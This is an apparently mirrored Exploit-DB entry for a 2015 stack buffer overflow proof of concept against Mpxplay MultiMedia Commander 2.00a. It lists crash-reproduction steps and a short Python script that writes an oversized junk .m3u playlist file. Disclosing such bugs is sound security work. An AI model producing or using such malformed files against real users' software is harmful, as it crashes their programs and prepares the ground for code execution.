Mpxplay MultiMedia Commander 2.00a – ‘.m3u’ Stack Buffer Overflow (PoC)

  • 作者: Un_N0n
    日期: 2015-09-01
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/38053/
  • ********************************************************************************************
    # Exploit Title: Mpxplay Multimedia Commander Stack-based BOF
    # Date: 9/1/2015
    # Exploit Author: Un_N0n
    # Software Link: http://sourceforge.net/p/mpxplay/activity?source=project_activity
    # Version: V2.00a
    # Tested on: Windows 7 x86(32 BIT)
    ********************************************************************************************
    
    [Steps to Produce the Crash]:
    1- open 'mpxp_mmc.exe'.
    2- Browser Crash.m3u in audio player.
    ~ Software will Crash.
    
    [Code to produce crash.txt]: 
    junk = "A"*66666
    file = open("CRASH.m3u",'w')
    file.write(junk)
    file.close()
    **********************************************************************************************